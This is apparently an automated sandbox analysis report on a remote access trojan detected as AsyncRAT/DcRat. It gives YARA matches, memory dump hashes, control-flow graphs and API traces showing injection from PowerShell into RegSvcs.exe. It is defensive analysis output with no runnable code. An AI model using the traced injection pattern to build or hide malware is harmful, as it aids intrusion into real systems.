                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                            Imagebase:0xdc0000
                                            File size:45'984 bytes
                                            MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000004.00000002.2957234369.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000004.00000002.2957234369.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                            • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000004.00000002.2958714804.000000000148B000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                            • Rule: JoeSecurity_DcRat_2, Description: Yara detected DcRat, Source: 00000004.00000002.2959693552.0000000003181000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000004.00000002.2959693552.0000000003181000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                            • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000004.00000002.2958104515.0000000001438000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                            Reputation:high
                                            Has exited:false

                                            Disassembly

                                            Reset < >

                                              Executed Functions

                                              Function 00007FFD9B8937B5 Relevance: .0, Instructions: 49COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1730534384.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_7ffd9b890000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                              • Instruction ID: 5b86534c8524b0afe59b57662357e645227b18a14a5c8e3dcc67305ce5c1f501
                                              • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                              • Instruction Fuzzy Hash: D001677121CB0D8FDB48EF0CE451AA6B7E0FB99364F10056DE58AC36A5D636E882CB45

                                              Execution Graph

                                              Execution Coverage:12.3%
                                              Dynamic/Decrypted Code Coverage:0%
                                              Signature Coverage:0%
                                              Total number of Nodes:12
                                              Total number of Limit Nodes:0

                                              Executed Functions

                                              Function 00007FFD9B8974E4 Relevance: 2.0, APIs: 1, Instructions: 470processCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1707947501.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_7ffd9b890000_powershell.jbxd
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID:
                                              • API String ID: 963392458-0
                                              • Opcode ID: cca51e4383081384e5e1491b44dd72c1023e963b71ff66b77848935adea8e2f7
                                              • Instruction ID: 037a7b2fde69e2f98db6a356539fa2d6c0d1c6293a5284798dc79ccb7e659f3a
                                              • Opcode Fuzzy Hash: cca51e4383081384e5e1491b44dd72c1023e963b71ff66b77848935adea8e2f7
                                              • Instruction Fuzzy Hash: 8AF19D70909A9C8FDB99DF58C864BE9BBF0EF5A310F0500EEC049E72A2DB345985CB01
                                              Function 00007FFD9B897EED Relevance: 1.7, APIs: 1, Instructions: 214injectionCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1707947501.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_7ffd9b890000_powershell.jbxd
                                              Similarity
                                              • API ID: MemoryProcessWrite
                                              • String ID:
                                              • API String ID: 3559483778-0
                                              • Opcode ID: a42b6ba7fc4a7536ccc46028faf3582bcadf13643363913c58bcfc380abe7526
                                              • Instruction ID: 321e6bfc4e8b2b9159bfc827ca973f9290ee059497c626c8424365e109d79a5d
                                              • Opcode Fuzzy Hash: a42b6ba7fc4a7536ccc46028faf3582bcadf13643363913c58bcfc380abe7526
                                              • Instruction Fuzzy Hash: 18611370908A5D8FDB98DF98C894BE9BBF1FB69310F1041AED04DE3291DB74A985CB40
                                              Function 00007FFD9B8979E9 Relevance: 1.7, APIs: 1, Instructions: 189threadCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1707947501.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_7ffd9b890000_powershell.jbxd
                                              Similarity
                                              • API ID: ContextThreadWow64
                                              • String ID:
                                              • API String ID: 983334009-0
                                              • Opcode ID: 25916284187f03206d39fccb31ecb116b3b06dd254b33a21c9474d0fe3d1cd5e
                                              • Instruction ID: 0b786467a1e42596e52fe60bc31806a5b9c44fa872e07d82d9200250003127af
                                              • Opcode Fuzzy Hash: 25916284187f03206d39fccb31ecb116b3b06dd254b33a21c9474d0fe3d1cd5e
                                              • Instruction Fuzzy Hash: 7C519F70D08A4D8FDB59DF98C844BE9BBF1FB5A310F1082AAD048D7266C7749985CF40
                                              Function 00007FFD9B8980D9 Relevance: 1.6, APIs: 1, Instructions: 138threadCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 52 7ffd9b8980d9-7ffd9b8980e5 53 7ffd9b8980e7-7ffd9b8980ef 52->53 54 7ffd9b8980f0-7ffd9b8981ba ResumeThread 52->54 53->54 57 7ffd9b8981bc 54->57 58 7ffd9b8981c2-7ffd9b898200 54->58 57->58
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1707947501.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_7ffd9b890000_powershell.jbxd
                                              Similarity
                                              • API ID: ResumeThread
                                              • String ID:
                                              • API String ID: 947044025-0
                                              • Opcode ID: b1d9642ddd603b37743eeb28b2bc3dad44d2e80d2f43e3bb9beb18ec803d8888
                                              • Instruction ID: 36f802aafdc61dd42915a5f202b4d684a889a5ae6063bd2d631fde88da5d4eca
                                              • Opcode Fuzzy Hash: b1d9642ddd603b37743eeb28b2bc3dad44d2e80d2f43e3bb9beb18ec803d8888
                                              • Instruction Fuzzy Hash: 19415B7090874C8FDF59DF98D895BA9BBB0FF5A310F1041AED449E7252DA70A846CB41
                                              Function 00007FFD9B96128B Relevance: .9, Instructions: 858COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 223 7ffd9b96128b-7ffd9b961309 225 7ffd9b96130f-7ffd9b961319 223->225 226 7ffd9b961458-7ffd9b9614b4 223->226 227 7ffd9b961332-7ffd9b961337 225->227 228 7ffd9b96131b-7ffd9b961330 225->228 253 7ffd9b9614df-7ffd9b961507 226->253 254 7ffd9b9614b6-7ffd9b9614dd 226->254 229 7ffd9b96133d-7ffd9b961340 227->229 230 7ffd9b9613f5-7ffd9b9613ff 227->230 228->227 233 7ffd9b961342-7ffd9b961355 229->233 234 7ffd9b961389 229->234 236 7ffd9b961401-7ffd9b96140f 230->236 237 7ffd9b961410-7ffd9b961455 230->237 233->226 247 7ffd9b96135b-7ffd9b961365 233->247 241 7ffd9b96138b-7ffd9b96138d 234->241 237->226 241->230 244 7ffd9b96138f-7ffd9b961392 241->244 244->230 245 7ffd9b961394-7ffd9b96139a 244->245 249 7ffd9b9613b9-7ffd9b9613cc 245->249 250 7ffd9b96139c-7ffd9b9613b7 245->250 251 7ffd9b96137e-7ffd9b961387 247->251 252 7ffd9b961367-7ffd9b961374 247->252 264 7ffd9b9613ce-7ffd9b9613db 249->264 265 7ffd9b9613e5-7ffd9b9613f4 249->265 250->249 251->241 252->251 261 7ffd9b961376-7ffd9b96137c 252->261 270 7ffd9b96150e-7ffd9b96151f 253->270 271 7ffd9b961509 253->271 254->253 261->251 264->265 272 7ffd9b9613dd-7ffd9b9613e3 264->272 274 7ffd9b961521 270->274 275 7ffd9b961526-7ffd9b9615bf 270->275 271->270 273 7ffd9b96150b 271->273 272->265 273->270 274->275 277 7ffd9b961523 274->277 280 7ffd9b961759-7ffd9b9617b7 275->280 281 7ffd9b9615c5-7ffd9b9615cf 275->281 277->275 306 7ffd9b9617e2-7ffd9b961805 280->306 307 7ffd9b9617b9-7ffd9b9617e0 280->307 282 7ffd9b9615d1-7ffd9b9615df 281->282 283 7ffd9b9615e9-7ffd9b9615ef 281->283 282->283 289 7ffd9b9615e1-7ffd9b9615e7 282->289 286 7ffd9b9616ee-7ffd9b9616f8 283->286 287 7ffd9b9615f5-7ffd9b9615f8 283->287 290 7ffd9b9616fa-7ffd9b96170a 286->290 291 7ffd9b96170b-7ffd9b961756 286->291 292 7ffd9b961641 287->292 293 7ffd9b9615fa-7ffd9b96160d 287->293 289->283 291->280 294 7ffd9b961643-7ffd9b961645 292->294 293->280 304 7ffd9b961613-7ffd9b96161d 293->304 294->286 297 7ffd9b96164b-7ffd9b96164e 294->297 297->286 301 7ffd9b961654-7ffd9b961657 297->301 301->286 305 7ffd9b96165d-7ffd9b96169b 301->305 308 7ffd9b96161f-7ffd9b961634 304->308 309 7ffd9b961636-7ffd9b96163f 304->309 305->286 330 7ffd9b96169d-7ffd9b9616a3 305->330 319 7ffd9b961811-7ffd9b96181d 306->319 320 7ffd9b961807-7ffd9b96180d 306->320 307->306 308->309 309->294 323 7ffd9b96181f-7ffd9b961825 319->323 324 7ffd9b961829-7ffd9b9618a4 319->324 320->319 323->324 331 7ffd9b9618eb-7ffd9b9618f5 324->331 332 7ffd9b9618a6-7ffd9b9618e8 324->332 333 7ffd9b9616c2-7ffd9b9616d8 330->333 334 7ffd9b9616a5-7ffd9b9616c0 330->334 336 7ffd9b961900-7ffd9b96194b 331->336 337 7ffd9b9618f7-7ffd9b9618ff 331->337 332->331 340 7ffd9b9616de-7ffd9b9616ed 333->340 334->333
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1708290172.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_7ffd9b960000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 06d6ed0eb1875313de1c1a85bc15dc002b5a1b58a1b158b38850dd1e7bcb7515
                                              • Instruction ID: 0582ec69ce02df32a53d6b8a366edb641cdfcfd8cf8d01e56a85a1c846ee3d67
                                              • Opcode Fuzzy Hash: 06d6ed0eb1875313de1c1a85bc15dc002b5a1b58a1b158b38850dd1e7bcb7515
                                              • Instruction Fuzzy Hash: 5D428B32B1EB995FE76A876858255B83BE1EF56224B0901FFD04DC71E3DD18AD06C381
                                              Function 00007FFD9B96078D Relevance: .4, Instructions: 375COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1708290172.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_7ffd9b960000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1532f5884be9467a98dd402a73465d1a45283b39bd1775464985d1d377c35bc1
                                              • Instruction ID: ec9de7ee391f1e725ca8f75cdc22fedb99ccfdee90479ea1e3e7f4ae953836c9
                                              • Opcode Fuzzy Hash: 1532f5884be9467a98dd402a73465d1a45283b39bd1775464985d1d377c35bc1
                                              • Instruction Fuzzy Hash: 31B12522B2FB895FE7AA97A808F42B57BE1DF56B54B0900FBD08DC70E7E9095D058341
                                              Function 00007FFD9B960DCE Relevance: .2, Instructions: 150COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 417 7ffd9b960dce-7ffd9b960de4 418 7ffd9b960dfd-7ffd9b960e02 417->418 419 7ffd9b960de6-7ffd9b960df3 417->419 420 7ffd9b960e9a-7ffd9b960ea4 418->420 421 7ffd9b960e08-7ffd9b960e0b 418->421 419->418 423 7ffd9b960df5-7ffd9b960dfb 419->423 425 7ffd9b960eb3-7ffd9b960ef6 420->425 426 7ffd9b960ea6-7ffd9b960eb2 420->426 421->420 424 7ffd9b960e11-7ffd9b960e14 421->424 423->418 427 7ffd9b960e3b 424->427 428 7ffd9b960e16-7ffd9b960e39 424->428 431 7ffd9b960e3d-7ffd9b960e3f 427->431 428->431 431->420 433 7ffd9b960e41-7ffd9b960e4b 431->433 433->420 438 7ffd9b960e4d-7ffd9b960e63 433->438 440 7ffd9b960e6a-7ffd9b960e73 438->440 441 7ffd9b960e8c-7ffd9b960e99 440->441 442 7ffd9b960e75-7ffd9b960e82 440->442 442->441 444 7ffd9b960e84-7ffd9b960e8a 442->444 444->441
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1708290172.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_7ffd9b960000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7f06afb18a1aa0cccefd25536ca878f7027bfc993e1030e0a5b3d52dd2bf4e59
                                              • Instruction ID: e6a556dff0ad52b3c7c2b2a8cb5b5c75c5f3c38bd93e7d499744fbe34469b038
                                              • Opcode Fuzzy Hash: 7f06afb18a1aa0cccefd25536ca878f7027bfc993e1030e0a5b3d52dd2bf4e59
                                              • Instruction Fuzzy Hash: 42411B22F5EE6D5FEBB69BAC28F16B877C1DF84B10B09017AD44DC319AED18AD014381
                                              Function 00007FFD9B96085A Relevance: .1, Instructions: 120COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 446 7ffd9b96085a-7ffd9b960866 448 7ffd9b96096a-7ffd9b960974 446->448 449 7ffd9b96086c-7ffd9b9608a3 446->449 450 7ffd9b960983-7ffd9b960a23 448->450 451 7ffd9b960976-7ffd9b960982 448->451 461 7ffd9b9608a5-7ffd9b9608c5 449->461 462 7ffd9b9608c7 449->462 476 7ffd9b960a4e-7ffd9b960a79 450->476 477 7ffd9b960a25-7ffd9b960a4c 450->477 463 7ffd9b9608c9-7ffd9b9608cb 461->463 462->463 463->448 465 7ffd9b9608d1-7ffd9b9608d4 463->465 465->448 468 7ffd9b9608da-7ffd9b960914 465->468 484 7ffd9b960930-7ffd9b960933 468->484 485 7ffd9b960916-7ffd9b96092e 468->485 487 7ffd9b960a7c-7ffd9b960a8d 476->487 488 7ffd9b960a7b 476->488 477->476 490 7ffd9b96093a-7ffd9b960943 484->490 485->484 491 7ffd9b960a90-7ffd9b960aa9 487->491 492 7ffd9b960a8f 487->492 488->487 494 7ffd9b96095c-7ffd9b960969 490->494 495 7ffd9b960945-7ffd9b960952 490->495 492->491 495->494 497 7ffd9b960954-7ffd9b96095a 495->497 497->494
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1708290172.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_7ffd9b960000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 549197b8bda4011b97a644ee7a548536ea3549467aafc0e29cfc2c708d99f940
                                              • Instruction ID: dba6fadadd13e772374a333aee6cced985b8d066c271489fa206ad93dcd27614
                                              • Opcode Fuzzy Hash: 549197b8bda4011b97a644ee7a548536ea3549467aafc0e29cfc2c708d99f940
                                              • Instruction Fuzzy Hash: 1631AE62F2FA9E5FF7B9E7A808F527826C19F55A94B4900BAD45DC20EBEC09AD404241

                                              Execution Graph

                                              Execution Coverage:15.8%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:0%
                                              Total number of Nodes:24
                                              Total number of Limit Nodes:1
                                              execution_graph 7704 13e2080 7705 13e20ca LoadLibraryA 7704->7705 7707 13e2123 7705->7707 7708 13e09e0 7709 13e0a02 7708->7709 7712 13e1ef1 7709->7712 7710 13e0adc 7713 13e1f18 7712->7713 7714 13e1f39 7713->7714 7718 13e23a0 7713->7718 7723 13e2390 7713->7723 7714->7710 7715 13e1f5b 7715->7710 7719 13e23c0 7718->7719 7720 13e2432 7719->7720 7728 13e22d8 7719->7728 7732 13e22d3 7719->7732 7720->7715 7724 13e23a0 7723->7724 7725 13e2432 7724->7725 7726 13e22d8 VirtualProtect 7724->7726 7727 13e22d3 VirtualProtect 7724->7727 7725->7715 7726->7725 7727->7725 7729 13e2320 VirtualProtect 7728->7729 7731 13e235b 7729->7731 7731->7720 7733 13e2320 VirtualProtect 7732->7733 7735 13e235b 7733->7735 7735->7720

                                              Executed Functions

                                              Function 013E65D0 Relevance: 1.5, Strings: 1, Instructions: 281COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 409 13e65d0-13e6636 411 13e6638-13e6643 409->411 412 13e6680-13e6682 409->412 411->412 414 13e6645-13e6651 411->414 413 13e6684-13e669d 412->413 420 13e669f-13e66ab 413->420 421 13e66e9-13e66eb 413->421 415 13e6674-13e667e 414->415 416 13e6653-13e665d 414->416 415->413 418 13e665f 416->418 419 13e6661-13e6670 416->419 418->419 419->419 422 13e6672 419->422 420->421 423 13e66ad-13e66b9 420->423 424 13e66ed-13e6745 421->424 422->415 425 13e66dc-13e66e7 423->425 426 13e66bb-13e66c5 423->426 433 13e678f-13e6791 424->433 434 13e6747-13e6752 424->434 425->424 427 13e66c9-13e66d8 426->427 428 13e66c7 426->428 427->427 430 13e66da 427->430 428->427 430->425 436 13e6793-13e67ab 433->436 434->433 435 13e6754-13e6760 434->435 437 13e6762-13e676c 435->437 438 13e6783-13e678d 435->438 443 13e67ad-13e67b8 436->443 444 13e67f5-13e67f7 436->444 439 13e676e 437->439 440 13e6770-13e677f 437->440 438->436 439->440 440->440 442 13e6781 440->442 442->438 443->444 445 13e67ba-13e67c6 443->445 446 13e67f9-13e684a 444->446 447 13e67c8-13e67d2 445->447 448 13e67e9-13e67f3 445->448 454 13e6850-13e685e 446->454 449 13e67d6-13e67e5 447->449 450 13e67d4 447->450 448->446 449->449 452 13e67e7 449->452 450->449 452->448 455 13e6867-13e68c7 454->455 456 13e6860-13e6866 454->456 463 13e68c9-13e68cd 455->463 464 13e68d7-13e68db 455->464 456->455 463->464 465 13e68cf 463->465 466 13e68dd-13e68e1 464->466 467 13e68eb-13e68ef 464->467 465->464 466->467 468 13e68e3 466->468 469 13e68ff-13e6903 467->469 470 13e68f1-13e68f5 467->470 468->467 472 13e6905-13e6909 469->472 473 13e6913-13e6917 469->473 470->469 471 13e68f7-13e68fa call 13e1eb4 470->471 471->469 472->473 474 13e690b-13e690e call 13e1eb4 472->474 475 13e6919-13e691d 473->475 476 13e6927-13e692b 473->476 474->473 475->476 479 13e691f-13e6922 call 13e1eb4 475->479 480 13e692d-13e6931 476->480 481 13e693b-13e693f 476->481 479->476 480->481 483 13e6933 480->483 484 13e694f 481->484 485 13e6941-13e6945 481->485 483->481 487 13e6950 484->487 485->484 486 13e6947 485->486 486->484 487->487
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2957938947.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_13e0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: \V\o
                                              • API String ID: 0-61690773
                                              • Opcode ID: 22bbb7f1727a60fb7024cb0a6cc990d16f08ee0712b405d53f84e6070b03004b
                                              • Instruction ID: bc505b942cf2119ee0c3b3f231a92b8dc6369483d70ae80e9139de06ab80f19f
                                              • Opcode Fuzzy Hash: 22bbb7f1727a60fb7024cb0a6cc990d16f08ee0712b405d53f84e6070b03004b
                                              • Instruction Fuzzy Hash: 0AB14EB0E10329CFDF10CFA9D98A7DDBBF2AF98318F148129D415A7294EB749845CB81
                                              Function 013E6EA0 Relevance: .3, Instructions: 266COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2957938947.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_13e0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f7a9dcea97717d16a4106e35c416f5a773b4ac16efb2b052d387a7daf22a90ab
                                              • Instruction ID: 95c57c05fb2c8b21cd9ee85a5e9398782dbefb62df71e7b22a2d7c10b3ac8eeb
                                              • Opcode Fuzzy Hash: f7a9dcea97717d16a4106e35c416f5a773b4ac16efb2b052d387a7daf22a90ab
                                              • Instruction Fuzzy Hash: B6B13E70E10319CFDF14CFA9D8997DDBBF2AF88318F148529E415A7294EB749845CB81
                                              Function 013E2074 Relevance: 1.6, APIs: 1, Instructions: 81libraryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 365 13e2074-13e207d 366 13e207f-13e20b2 365->366 367 13e20b8-13e2121 LoadLibraryA 365->367 366->367 370 13e212a-13e2179 367->370 371 13e2123-13e2129 367->371 377 13e217b 370->377 378 13e2183 370->378 371->370 377->378 379 13e2184 378->379 379->379
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2957938947.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_13e0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID:
                                              • API String ID: 1029625771-0
                                              • Opcode ID: 38edd3c0eb9236599290f377d2a717561588390cb695d795054861585ab5b63c
                                              • Instruction ID: fa317f35593573ebb83a36fe28bde037b98d78b71961b7c8ca7dd92b00c2d752
                                              • Opcode Fuzzy Hash: 38edd3c0eb9236599290f377d2a717561588390cb695d795054861585ab5b63c
                                              • Instruction Fuzzy Hash: F53102B4D012589FDB24CFA8D588BDEBFF5AF48314F24802AE405AB2A4D774A945CB90
                                              Function 013E2080 Relevance: 1.6, APIs: 1, Instructions: 71libraryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 380 13e2080-13e2121 LoadLibraryA 383 13e212a-13e2179 380->383 384 13e2123-13e2129 380->384 390 13e217b 383->390 391 13e2183 383->391 384->383 390->391 392 13e2184 391->392 392->392
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2957938947.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_13e0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID:
                                              • API String ID: 1029625771-0
                                              • Opcode ID: 897d3d71e5e94329c4aa03c38329f382a818ef349e5cea26a34a250158db33b0
                                              • Instruction ID: c510930497eaaea7f19b0c945439d71de731eb47917fd73a2e86022854e76c16
                                              • Opcode Fuzzy Hash: 897d3d71e5e94329c4aa03c38329f382a818ef349e5cea26a34a250158db33b0
                                              • Instruction Fuzzy Hash: 4531EFB4D01248DFDB14CFA9D588B8EBBF5AF48314F248029E408AB3A4DB74A945CB94
                                              Function 013E22D8 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 401 13e22d8-13e2359 VirtualProtect 404 13e235b-13e2361 401->404 405 13e2362-13e2387 401->405 404->405
                                              APIs
                                              • VirtualProtect.KERNEL32(?,?,?,?), ref: 013E234C
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2957938947.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_13e0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID: ProtectVirtual
                                              • String ID:
                                              • API String ID: 544645111-0
                                              • Opcode ID: 4f1f183ff5b981ad51b6006bf4843033714c04c40d37a998164c45087a3b6efa
                                              • Instruction ID: f1d419a7c72fb6daa2428a508e8d3292f56692e4fea887949546208139f1fc38
                                              • Opcode Fuzzy Hash: 4f1f183ff5b981ad51b6006bf4843033714c04c40d37a998164c45087a3b6efa
                                              • Instruction Fuzzy Hash: 2811F4B19002499FDB10DFAAC844ADEFBF8EF88324F10842AD459A7250C775A944CFA5
                                              Function 013E22D3 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 393 13e22d3-13e2359 VirtualProtect 396 13e235b-13e2361 393->396 397 13e2362-13e2387 393->397 396->397
                                              APIs
                                              • VirtualProtect.KERNEL32(?,?,?,?), ref: 013E234C
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2957938947.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_13e0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID: ProtectVirtual
                                              • String ID:
                                              • API String ID: 544645111-0
                                              • Opcode ID: 7e0e7be8a49495ed3b60229c9da6ccf5dbfc8a0858f489acc1c373e204df6807
                                              • Instruction ID: 87f8bfe8ad53f2c898b265f3a3e0e6a6c61b7a12bbfde2cdc7345c2147474c11
                                              • Opcode Fuzzy Hash: 7e0e7be8a49495ed3b60229c9da6ccf5dbfc8a0858f489acc1c373e204df6807
                                              • Instruction Fuzzy Hash: 3521F7B19002498FDB20DFAAC484AEEFBF5FF88314F14842AE459A7250C7759945CFA0

                                              Non-executed Functions

                                              Function 013E6288 Relevance: 1.5, Strings: 1, Instructions: 238COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2957938947.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_13e0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: \V\o
                                              • API String ID: 0-61690773
                                              • Opcode ID: f44b0b678bd3475b7213a47396c57b8450bb777d06b1b7bf6294be96b019a11d
                                              • Instruction ID: 4e76e81ec0003ee6c7e24131a7f28ef99c06bb94b5f76bdbca9989dfbe09f1c5
                                              • Opcode Fuzzy Hash: f44b0b678bd3475b7213a47396c57b8450bb777d06b1b7bf6294be96b019a11d
                                              • Instruction Fuzzy Hash: 81915EB0E00319CFDF14CFA9D99A7DDBBF2AF98318F148129E415A7294EB749845CB81
                                              Function 013EB590 Relevance: 1.0, Instructions: 1020COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2957938947.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_13e0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1c0f0883bc1983c912c0e843da54fe1e20ba68a10a979264abacfdd0b9f1b28b
                                              • Instruction ID: 07ef221da4f0d82ce69c7f34dc5c27b18a3487697c03dc48e74167daf234458b
                                              • Opcode Fuzzy Hash: 1c0f0883bc1983c912c0e843da54fe1e20ba68a10a979264abacfdd0b9f1b28b
                                              • Instruction Fuzzy Hash: 39827A707003158FDB19EF69C998B2EBBE2FF84708F248529D5069B3A5CB75DC4A8B41